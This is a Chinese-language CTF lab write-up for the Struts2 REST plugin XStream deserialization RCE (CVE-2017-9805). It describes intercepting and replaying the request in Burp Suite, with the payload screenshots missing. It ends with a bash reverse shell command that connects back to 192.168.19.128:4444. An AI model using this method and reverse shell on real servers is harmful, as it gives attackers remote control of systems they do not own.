Skip to content

Latest commit

 

History

History
32 lines (17 loc) · 1 KB

struts2-052 远程代码执行 (CVE-2017-9805).md

File metadata and controls

32 lines (17 loc) · 1 KB

struts2-052 远程代码执行 (CVE-2017-9805)

。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。

打开靶场

img

抓包

img

在burpsuite中改包进行重放,payload如下。

img

上面的数据包中执行命令的地方在这里:

img

执行的是创建shell.txt文件的命令,但我们需要的是获取flag,于是修改pyload,改成反弹shell的命令: 在远程命令执行过程中,由于务器不识别&这个符号,需要编码,将&换成 &,如下所示

bash

-c

bash -i >& /dev/tcp/192.168.19.128/4444 0>&1